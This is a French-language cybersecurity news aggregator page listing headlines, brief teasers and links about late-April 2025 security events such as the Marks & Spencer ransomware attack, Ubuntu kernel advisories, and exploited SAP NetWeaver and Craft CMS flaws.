https://infosecwriteups.com/how-hackers-try-to-bypass-403-forbidden-pages-239c3f51a674?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How I Set Up a Free Server That I'll Never Have to Pay For
About one year ago, after my Amazon Web Services and Google Cloud trials expired, I started looking for other free cloud services.Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/how-i-set-up-a-free-server-that-ill-never-have-to-pay-for-804b5fe52901?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Finding Child Abuse Sites on the Darkweb
CASE STUDYHow I mapped 100+ child exploitation sites via StealthMoleSource: AuthorWhat is StealthMole?StealthMole is a cyber intelligence platform specializing in Deep and Darkweb monitoring and threat intelligence. It helps investigators, analysts, and law enforcement track malicious activities hidden beyond the regular internet.StealthMole continuously monitors hidden services, darknet marketplaces, encrypted platforms like Telegram, and compromised data repositories, offering actionable intelligence through a user-friendly interface. Some of its core modules include,Darkweb TrackerTelegram TrackerCompromised DatasetCredential LookoutRansomware MonitoringLeaked MonitoringGovernment MonitoringDefacement AlertsUnlike basic scrapers or search engines, StealthMole offers investigation-grade...
https://infosecwriteups.com/finding-child-abuse-sites-on-the-darkweb-efc3a954caf6?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
WooCommerce Users Beware: Fake Patch Phishing Campaign Unleashes Site Backdoors
Imagine this: you’re running your WooCommerce store, sipping coffee ☕, and an urgent email lands in your inbox. It screams, “Critical…Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/woocommerce-users-beware-fake-patch-phishing-campaign-unleashes-site-backdoors-d77ccb847d8b?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
JWT, Meet Me Outside: How I Decoded, Re-Signed, and Owned the App
Hey there!😁Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/jwt-meet-me-outside-how-i-decoded-re-signed-and-owned-the-app-95791eabcf5d?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hackers Exploit Craft CMS Flaws: A Deep Dive into CVE-2025–32432
Imagine running a sleek website powered by Craft CMS, only to discover that hackers have slipped through the digital backdoor, wreaking…Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/hackers-exploit-craft-cms-flaws-a-deep-dive-into-cve-2025-32432-edfab5a4819b?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7455-5: Linux kernel (AWS) vulnerabilities
Jann Horn discovered that the watch_queue event notification subsystem in
the Linux kernel contained an out-of-bounds write vulnerability. A local
attacker could use this to cause a denial of service (system crash) or
escalate their privileges. (CVE-2022-0995)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
- iSCSI Boot Firmware Table Attributes driver;
- Network drivers;
- File systems infrastructure;
- NTFS3 file system;
- Ethernet bridge;
- Ethtool driver;
- IPv6 networking;
- Network traffic control;
- VMware vSockets driver;
(CVE-2024-26837, CVE-2025-21993, CVE-2025-21702, CVE-2024-50248,
CVE-2024-46826, CVE-2024-50256, CVE-2025-21703,...
https://ubuntu.com/security/notices/USN-7455-5
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
U.S. CISA adds Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are […]
https://securityaffairs.com/177161/hacking/u-s-cisa-adds-qualitia-active-mail-broadcom-brocade-fabric-os-and-commvault-web-server-flaws-to-its-known-exploited-vulnerabilities-catalog.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Introducing EntraFalcon – A Tool to Enumerate Entra ID Objects and Assignments
TL;DR: PowerShell tool to enumerate Entra ID objects, assignments and identify highly privileged objects or risky configurations. https://github.com/CompassSecurity/EntraFalcon Entra ID environments can contain thousands of objects – users, groups, service principals, and more – each with unique properties and complex relationships. While manual reviews through the Entra portal might be feasible in smaller environments, they […]
https://blog.compass-security.com/2025/04/introducing-entrafalcon-a-tool-to-enumerate-entra-id-objects-and-assignments/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu de la veille (Presse)
Britain's M&S says cyber attack has hit food availability in some stores - Reuters
Britain's M&S says cyber attack has hit food availability in some stores ... LONDON, April 29 (Reuters) - British retailer Marks & Spencer (MKS.L) , ...
https://www.reuters.com/business/retail-consumer/britains-ms-says-cyber-attack-has-hit-food-availability-some-stores-2025-04-29/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
M&S cyber attack that has crippled sales is 'linked to gang of teenage hackers' - The Mirror
M&S cyber attack that has crippled sales is 'linked to gang of teenage hackers'. Reports say the group, said to include members as young as 16 ...
https://www.mirror.co.uk/money/ms-cyber-attack-crippled-stores-35138761
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Britain's M&S says cyber attack has hit food availability in some stores - Yahoo Finance
Britain's M&S says cyber attack has hit food availability in some stores. Oops, something went wrong. News · Today's news · US · Politics · World ...
https://finance.yahoo.com/news/britains-m-says-cyber-attack-161152307.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
M&S issues update after cyber attack leaves stores with empty shelves - Yahoo News UK
The cyber attack that first hit M&S stores last week is causing availability problems in some shops.
https://uk.news.yahoo.com/m-issues-cyber-attack-leaves-151231784.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DuPage County, Ill., Cyber Attack Shutters Justice Systems - GovTech
DuPage County, Ill., Cyber Attack Shutters Justice Systems. The ransomware incident has forced county officials to take offline systems belonging ...
https://www.govtech.com/security/dupage-county-ill-cyber-attack-shutters-justice-systems
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pakistani Hackers ने किया Cyber Attack! - short-videos AajTak
Pakistani Hackers की करतूत, Indian Army से जुड़ी साइट्स पर किया Cyber Attack!
https://www.aajtak.in/short-videos/video/pakistani-hackers-tried-to-launch-a-cyber-attack-on-indian-army-related-sites-2228757-2025-04-29
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Spain and Portugal blackouts latest: Power cuts not caused by cyber attack, Spanish grid says
Spain and Portugal blackouts latest: Power cuts not caused by cyber attack, Spanish grid says - but investigation launched. Power has mostly been ...
https://news.sky.com/story/spain-and-portugal-blackouts-latest-power-cuts-not-caused-by-cyber-attack-spanish-grid-says-13357538
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scattered Spider on the hook for M&S cyber attack | Computer Weekly
The infamous Scattered Spider hacking collective may have been behind the ongoing cyber attack on Marks and Spencer that has crippled systems at ...
https://www.computerweekly.com/news/366623453/Scattered-Spider-on-the-hook-for-MS-cyber-attack
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Need public records from the city of Abilene? It'll be lots longer due to the cyber attack
Federal authorities are investigating the cyber attack. Filing an initial catastrophe notice allows the city to forego responding to citizens' open ...
https://www.reporternews.com/story/news/2025/04/29/city-of-abilene-extends-cyber-attack-emergency-status/83349475007/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Iberian blackout raises fears of growing cyber-attack risks - SecurityBrief UK
A widespread blackout in Spain and Portugal sparks debate over whether a cyber-attack caused the outage, despite initial reports of a technical ...
https://securitybrief.co.uk/story/iberian-blackout-raises-fears-of-growing-cyber-attack-risks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Who is Scattered Spider, the group being linked to the M&S cyber attack? | ITV News
Marks and Spencer are still struggling with the fall out of a cyber attack that forced them to pause all online orders. | ITV National News.
https://www.itv.com/news/2025-04-29/who-is-scattered-spider-the-group-being-linked-to-the-m-and-s-cyber-attack
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu à J-2 (Presse spécialisée)
How Postal Code Data Impacts Cybersecurity, Privacy and Fraud Prevention
Postal codes now play a key role in cybersecurity, fraud prevention, and digital identity verification, raising new concerns…
https://hackread.com/postal-code-data-impact-cybersecurity-fraud-prevention/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Announcing New Legit ASPM AI Capabilities
Get details on Legit's new AI capabilities.
https://www.legitsecurity.com/blog/announcing-new-legit-aspm-ai-capabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SuperCard X Malware Attacks Android With NFC Relay Attacks
Android users need to stay wary of a new threat, particularly when dealing with payment…
SuperCard X Malware Attacks Android With NFC Relay Attacks on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/28/supercard-x-malware-attacks-android-with-nfc-relay-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cookie-Bite Attack Demoes Extension Exploit To Steal Browser Cookies
Researchers have devised a new attack strategy “Cookie-Bite” demonstrating cookie theft via malicious browser extensions.…
Cookie-Bite Attack Demoes Extension Exploit To Steal Browser Cookies on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/28/cookie-bite-attack-demoes-extension-exploit-to-steal-browser-cookies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SAP NetWeaver Visual Composer Flaw Under Active Exploitation
CVE-2025-31324 is a maximum severity bug that attackers exploited weeks before SAP released a patch for it.
https://www.darkreading.com/cyberattacks-data-breaches/sap-netweaver-visual-composer-flaw-active-exploitation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Turmoil Following BreachForums Shutdown: Confusion, Risks, and a New Beginning
BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration. On April 15, BreachForums, one of the top marketplaces for stolen data, abruptly shut down, fueling widespread speculation. Rumors ranged from FBI raids and the arrest of the administrator. In the aftermath, several alternative forums […]
https://securityaffairs.com/177146/hacking/the-turmoil-following-breachforums-shutdown-confusion-risks-and-a-new-beginning.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Marks & Spencer breach linked to Scattered Spider ransomware attack
Ongoing outages at British retail giant Marks & Spencer are caused by a ransomware attack believed to be conducted by threat actors known as "Scattered Spider" BleepingComputer has learned from multiple sources. [...]
https://www.bleepingcomputer.com/news/security/marks-and-spencer-breach-linked-to-scattered-spider-ransomware-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cloud Security Alliance Transforms IT Compliance and Assurance with Launch of Compliance Automation Revolution (CAR)
CAR to solve real-world compliance problems with practical and effective solutions
SAN FRANCISCO (RSA Conference) and SEATTLE – April 29, 2025 – Today's organizations have to comply with hundreds of data security and privacy laws, while grappling with an influx of even more regulations thanks to the rise of Artificial Intelligence (AI). Making matters more challenging, the proliferation of data and technology continues to increase the required scope of compliance efforts. Organizations...
https://cloudsecurityalliance.org/articles/csa-transforms-it-compliance-and-assurance-with-launch-of-compliance-automation-revolution
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7467-2: libxml2 vulnerabilities
USN-7467-1 fixed several vulnerabilities in libxml2. This update provides
the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.
Original advisory details:
It was discovered that the libxml2 Python bindings incorrectly handled
certain return values. An attacker could possibly use this issue to cause
libxml2 to crash, resulting in a denial of service. (CVE-2025-32414)
It was discovered that libxml2 incorrectly handled certain memory
operations. A remote attacker could possibly use this issue to cause
libxml2 to crash, resulting in a denial of service. (CVE-2025-32415)
https://ubuntu.com/security/notices/USN-7467-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Earth Kurma APT is actively targeting government and telecommunications orgs in Southeast Asia
Earth Kurma APT carried out a sophisticated campaign against government and telecommunications sectors in Southeast Asia. Trend Research exposed the Earth Kurma APT campaign targeting Southeast Asia's government and telecom sectors. Threat actors use custom malware, rootkits, and cloud storage for espionage, credential theft, and data exfiltration, posing a high business risk with advanced evasion […]
https://securityaffairs.com/177125/apt/earth-kurma-apt-is-actively-targeting-government-and-telecommunications-orgs-in-southeast-asia.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hitachi Vantara takes servers offline after Akira ransomware attack
Hitachi Vantara, a subsidiary of Japanese multinational conglomerate Hitachi, was forced to take servers offline over the weekend to contain an Akira ransomware attack. [...]
https://www.bleepingcomputer.com/news/security/hitachi-vantara-takes-servers-offline-after-akira-ransomware-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Evolving Role of GDPR Auditors
Originally published by Scrut Automation.
Written by Nicholas Muy.
The evolving role of GDPR Auditors
As businesses continue to rely more on data, the need for strong privacy and compliance measures has never been greater.
The General Data Protection Regulation (GDPR) safeguards personal data, but staying compliant is an ongoing challenge amid evolving regulations and technology.
Non-compliance risks hefty fines (like LinkedIn's €310 million fine in 2024), but bey...
https://cloudsecurityalliance.org/articles/the-evolving-role-of-gdpr-auditors
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
VeriSource now says February data breach impacts 4 million people
Employee benefits administration firm VeriSource Services is warning that a data breach exposed the personal information of four million people. [...]
https://www.bleepingcomputer.com/news/security/verisource-now-says-february-data-breach-impacts-4-million-people/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BreachForums Displays Message About Shutdown, Cites MyBB 0day Flaw
BreachForums posts a PGP-signed message explaining the sudden April 2025 shutdown. Admins cite MyBB 0day vulnerability impacting the…
https://hackread.com/breachforums-displays-message-shutdown-mybb-0day-flaw/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cloud Security Alliance Issues Top Threats to Cloud Computing Deep Dive 2025
Case studies articulate cloud computing's most significant and pressing issues
SAN FRANCISCO (RSA Conference) and SEATTLE - April 29, 2025 - The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications and best practices to help ensure a secure cloud computing environment, today issued the Top Threats to Cloud Computing Deep Dive 2025. The report examines eight real-life case studies involving, among others, a multinatio...
https://cloudsecurityalliance.org/articles/cloud-security-alliance-issues-top-threats-to-cloud-computing-deep-dive-2025
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7469-2: Apache Tomcat vulnerability
USN-7469-1 fixed a vulnerability in Apache Traffic Server. This
update provides the corresponding updates for Apache Tomcat.
Original advisory details:
It was discovered that Apache Traffic Server exhibited poor server
resource management in its HTTP/2 protocol. An attacker could possibly
use this issue to cause Apache Traffic Server to crash, resulting in
a denial of service.
https://ubuntu.com/security/notices/USN-7469-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Huntress Unveils Enhanced Identity Threat Detection & Response Solution as New Research Warns of Rising Identity-Based Attacks
Huntress today announced major enhancements to its Managed Identity Threat Detection and Response (ITDR) solution, delivering a purpose-built answer to disrupt hacker identity tradecraft. Alongside the launch, Huntress also revealed new research underscoring the growing threat of identity-based attacks and organisations’ struggles to defend against them. Based on findings from an independent UserEvidence survey of […]
The post Huntress Unveils Enhanced Identity Threat Detection & Response Solution as New Research Warns of Rising Identity-Based Attacks appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/28/huntress-unveils-enhanced-identity-threat-detection-response-solution-as-new-research-warns-of-rising-identity-based-attacks/?utm_source=rss&utm_medium=rss&utm_campaign=huntress-unveils-enhanced-identity-threat-detection-response-solution-as-new-research-warns-of-rising-identity-based-attacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7469-1: Apache Traffic Server vulnerability
It was discovered that Apache Traffic Server exhibited poor server
resource management in its HTTP/2 protocol. An attacker could possibly
use this issue to cause Apache Traffic Server to crash, resulting in
a denial of service.
https://ubuntu.com/security/notices/USN-7469-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7468-1: Linux kernel (Azure, N-Series) vulnerabilities
Michael Randrianantenaina discovered that the Bluetooth driver in the Linux
Kernel contained an improper access control vulnerability. A nearby
attacker could use this to connect a rougue device and possibly execute
arbitrary code. (CVE-2024-8805)
Attila Szász discovered that the HFS+ file system implementation in the
Linux Kernel contained a heap overflow vulnerability. An attacker could use
a specially crafted file system image that, when mounted, could cause a
denial of service (system crash) or possibly execute arbitrary code.
(CVE-2025-0927)
It was discovered that the CIFS network file system implementation in the
Linux kernel did not properly verify the target namespace when handling
upcalls. An attacker could use this to expose sensitive information.
(CVE-2025-2312)
Several security...
https://ubuntu.com/security/notices/USN-7468-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7459-2: Linux kernel (GCP) vulnerabilities
Jann Horn discovered that the watch_queue event notification subsystem in
the Linux kernel contained an out-of-bounds write vulnerability. A local
attacker could use this to cause a denial of service (system crash) or
escalate their privileges. (CVE-2022-0995)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
- ARM64 architecture;
- MIPS architecture;
- PowerPC architecture;
- RISC-V architecture;
- S390 architecture;
- SuperH RISC architecture;
- User-Mode Linux (UML);
- x86 architecture;
- Block layer subsystem;
- Cryptographic API;
- ACPI drivers;
- Drivers core;
- RAM backed block device driver;
- Virtio block driver;
- Data acquisition...
https://ubuntu.com/security/notices/USN-7459-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI, Automation, and Dark Web Fuel Evolving Threat Landscape
Attackers are leveraging the benefits of new technology and the availability of commodity tools, credentials, and other resources to develop sophisticated attacks more quickly than ever, putting defenders on their heels.
https://www.darkreading.com/remote-workforce/ai-automation-dark-web-fuel-evolving-threat-landscape
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Forget the Stack; Focus on Control
Security teams are under more pressure than ever — and cybersecurity debt is adding fuel to the fire. While it can't be eliminated overnight, it can be managed.
https://www.darkreading.com/vulnerabilities-threats/forget-stack-focus-control
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Court Dismisses Criminal Charges Against VPN Executive, Affirms No-Log Policy
Toronto, Canada, 28th April 2025, CyberNewsWire
https://hackread.com/court-dismisses-criminal-charges-against-vpn-executive-no-log-policy/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Introducing Rapid7's Exposure Assessment Platform Buyer's Guide
To help organizations navigate this rapidly changing threat landscape, we are excited to introduce the Exposure Assessment Platform (EAP) Buyer's Guide.
https://blog.rapid7.com/2025/04/28/introducing-rapid7s-exposure-assessment-platform-buyers-guide/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Employee monitoring app exposes users, leaks 21+ million screenshots
WorkComposer, an employee monitoring app, has leaked millions of screenshots through an unprotected AWS S3 bucket.
https://www.malwarebytes.com/blog/news/2025/04/employee-monitoring-app-exposes-users-leaks-21-million-screenshots
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Global Cybersecurity Market To Reach Trillion Annually By 2031
This week in cybersecurity from the editors at Cybercrime Magazine –Read the press release from EIN Presswire Sausalito, Calif. – Apr. 28, 2025 The imperative to protect increasingly digitized businesses, governments, schools, Internet of Things (IoT) devices, and consumers from cybercrime will propel global spending
The post Global Cybersecurity Market To Reach Trillion Annually By 2031 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/global-cybersecurity-market-to-reach-1-trillion-annually-by-2031/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!
Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling. Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity. >> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher# Fetch websites' source under the radar!>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)>> print(page.status)200>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!>> # Later, if the website structure changes, pass...
http://www.kitploit.com/2025/04/scrapling-undetectable-powerful.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7467-1: libxml2 vulnerabilities
It was discovered that the libxml2 Python bindings incorrectly handled
certain return values. An attacker could possibly use this issue to cause
libxml2 to crash, resulting in a denial of service. (CVE-2025-32414)
It was discovered that libxml2 incorrectly handled certain memory
operations. A remote attacker could possibly use this issue to cause
libxml2 to crash, resulting in a denial of service. (CVE-2025-32415)
https://ubuntu.com/security/notices/USN-7467-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DoJ Data Security Program Highlights Data-Sharing Challenges
The Department of Justice has announced compliance rules for its Data Security Program that will require organizations to reexamine how they do business and with whom.
https://www.darkreading.com/cyber-risk/doj-data-security-program-data-sharing-challenge
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Understanding the Linux Filesystem Case Sensitivity Debate
Linux's case-sensitive filesystems have long been seen as essential to the reliability and security of our much-loved OS. Still, recent discussions , led by Linus Torvalds' opposition to case insensitivity, highlight potential dangers associated with deviating from this norm. While case-insensitive filesystems may be prevalent elsewhere (such as Windows or macOS), their insensitivity can introduce security flaws that lead to filename ambiguities, privilege escalation risks, and path traversal exploits, creating opportunities for malicious actors in otherwise mundane operations.
https://linuxsecurity.com/features/features/linux-filesystem-case-sensitivity-debate
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Darcula Phishing Kit Uses AI to Evade Detection, Experts Warn
Darcula phishing platform adds AI to create multilingual scam pages easily. Netcraft warns of rising risks from Darcula-Suite…
https://hackread.com/darcula-phishing-kit-uses-ai-to-evade-detection/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-7465-1: Mistral vulnerabilities
It was discovered that Mistral incorrectly handled nested anchors in YAML
files. An attacker could possibly use this issue to cause a denial of
service. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-16848)
Pierre Gaxatte discovered that Mistral incorrectly handled erroneous SSH
private key filename commands. An attacker could possibly use this issue to
expose sensitive information. (CVE-2018-16849)
It was discovered that Mistral incorrectly handled the permissions of
sensitive log files. An attacker could possibly use this issue to expose
sensitive information. This issue only affected Ubuntu 18.04 LTS.
(CVE-2019-3866)
https://ubuntu.com/security/notices/USN-7465-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Overcoming SaaS Security Risks with Open-Source Tools
The explosive growth of Software-as-a-Service (SaaS) applications in recent years has ushered in new conveniences''and new risks. For us Linux security admins, safeguarding SaaS environments isn't just a nice-to-have; it's a critical responsibility. These cloud-based tools often integrate deeply with infrastructure, access sensitive data, and interact with APIs, which means any security gaps could ripple into the core systems that we Linux admins strive to protect. Add to this the rise of shadow IT, overly permissive access levels, and the ever-growing number of machine identities, and the complexities of modern SaaS security become clear.
https://linuxsecurity.com/features/features/open-source-saas-security-tools
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Active exploitation of SAP NetWeaver Visual Composer CVE-2025-31324
A critical SAP NetWeaver zero-day vulnerability (CVE-2025-31324) that allows for full SAP server compromise is being actively exploited in the wild.
https://blog.rapid7.com/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A large-scale phishing campaign targets WordPress WooCommerce users
A large-scale phishing campaign targets WordPress WooCommerce users with a fake security alert urging them to download a ‘critical patch’ hiding a backdoor. Patchstack researchers uncovered a large-scale phishing campaign targeting WordPress WooCommerce users with a fake security alert. Threat actors urge recipients to download a “critical patch” that hides a backdoor. The experts noted […]
https://securityaffairs.com/177115/hacking/a-large-scale-phishing-campaign-targets-wordpress-woocommerce-users.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
JokerOTP Dismantled After 28,000 Phishing Attacks, 2 Arrested
JokerOTP dismantled after 28,000 phishing attacks across 13 countries; UK and Dutch police arrest two suspects linked to £7.5M cyber fraud.
https://hackread.com/jokerotp-dismantled-28000-phishing-attacks-2-arrested/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Organisations Unprepared For Age of Quantum Computing
New research by ISACA has found that quantum computing, and the changes it will bring, is broadly welcomed by over half of cyber and IT professionals as a way of creating new opportunities for business. A further 44% believe quantum will create revolutionary innovations. But despite the expected impact of quantum computing, organisations are not […]
The post Organisations Unprepared For Age of Quantum Computing appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/28/quantum-computings-rapid-rise-is-a-risk-to-cybersecurity-and-business-stability-but-organisations-are-unprepared/?utm_source=rss&utm_medium=rss&utm_campaign=quantum-computings-rapid-rise-is-a-risk-to-cybersecurity-and-business-stability-but-organisations-are-unprepared
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CIOs Say Security Systems Not Delivering Value For Money, Too Complex To Manage
New research by Logicalis reveals that CIOs are struggling to derive value from security investments amid changing threat landscape. According to its annual CIO Report, which surveyed 1,000 global IT leaders, more than half say their security patch systems have become too complex to manage effectively. The top concerns for CIOs include malware and ransomware […]
The post CIOs Say Security Systems Not Delivering Value For Money, Too Complex To Manage appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/28/cios-say-security-systems-not-delivering-value-for-money-too-complex-to-manage/?utm_source=rss&utm_medium=rss&utm_campaign=cios-say-security-systems-not-delivering-value-for-money-too-complex-to-manage
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How safe and secure is your iPhone really?
Your iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.
https://www.welivesecurity.com/en/mobile-security/how-safe-secure-iphone/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
PoC rootkit Curing evades traditional Linux detection systems
Researchers created a PoC rootkit called Curing that uses Linux's io_uring feature to evade traditional system call monitoring. Armo researchers have demonstrated a proof-of-concept (PoC) rootkit named Curing that relies on Linux asynchronous I/O mechanism io_uring to bypass traditional system call monitoring. “Curing is a POC of a rootkit that uses io_uring to perform different tasks without using any syscalls, […]
https://securityaffairs.com/177098/hacking/poc-rootkit-curing-evades-traditional-linux-detection-systems.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MIWIC25: Caroline Kamper, Strategic Cyber Threat Intelligence Analyst, SecAlliance
Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024's Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee's answers are […]
The post MIWIC25: Caroline Kamper, Strategic Cyber Threat Intelligence Analyst, SecAlliance appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/28/miwic25-caroline-kamper-strategic-cyber-threat-intelligence-analyst-secalliance/?utm_source=rss&utm_medium=rss&utm_campaign=miwic25-caroline-kamper-strategic-cyber-threat-intelligence-analyst-secalliance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Attackers chained Craft CMS zero-days attacks in the wild
Orange Cyberdefense’s CSIRT reported that threat actors exploited two vulnerabilities in Craft CMS to breach servers and steal data. Orange Cyberdefense’s CSIRT warns that threat actors chained two Craft CMS vulnerabilities in recent attacks. Orange experts discovered the flaws while investigating a server compromise. The two vulnerabilities, tracked as CVE-2025-32432 and CVE-2024-58136, are respectively a […]
https://securityaffairs.com/177085/hacking/attackers-chained-craft-cms-zero-days-attacks-in-the-wild.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ASUS Fixed Critical Auth Bypass Vulnerability In AiCloud Routers
ASUS recently patched a vulnerability in routers enabled with AiCloud that could allow executing unauthorized…
ASUS Fixed Critical Auth Bypass Vulnerability In AiCloud Routers on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/28/asus-fixed-critical-auth-bypass-vulnerability-in-aicloud-routers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A week in security (April 21 – April 27)
A list of topics we covered in the week of April 21 to April 27 of 2025
https://www.malwarebytes.com/blog/news/2025/04/a-week-in-security-april-21-april-27
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu des jours précédents
Mobile Security & Malware Issue 4st Week of April, 2025
ASEC Blog publishes “Mobile Security & Malware Issue 4st Week of April, 2025”
https://asec.ahnlab.com/en/87699/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine. Features Supports pipe input for passing file lists and echoing URLs for testing Configurable retries and timeouts Supports GET, POST, and BOTH HTTP methods Advanced Filter Bypass (AFB) feature Flash Mode for quick XSS polyglot testing CheckPoC feature to verify the proof of concept Concurrent processing with configurable parallelism Custom headers support for authenticated requests Proxy support Discord webhook integration for notifications Detailed output with color-coded results Installation go install github.com/iqzer0/vulnknox@latest...
http://www.kitploit.com/2025/04/vulnknox-go-based-wrapper-for-knoxss.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
I Had Some Adventures with Alice and Bob (Podcast)! Also, what's next for Auntie Lesley?
Hi pals! It’s been a busy few months for me. Next week, I make my big move to Australia, so my blog might drop off for a bit while I get settled. I’ve gotten to cram in some final North American conference speaking appearances in Halifax (AtlSecCon), Milwaukee (CypherCon), and Chicago (ChiBrrCon). I’ve also been […]
https://tisiphone.net/2025/04/26/i-had-some-adventures-with-alice-and-bob-podcast/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Planet Technology Industrial Switch Flaws Risk Full Takeover – Patch Now
Immersive security researchers discovered critical vulnerabilities in Planet Technology network management and switch products, allowing full device control.…
https://hackread.com/planet-technology-industrial-switch-flaws-full-takeover/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
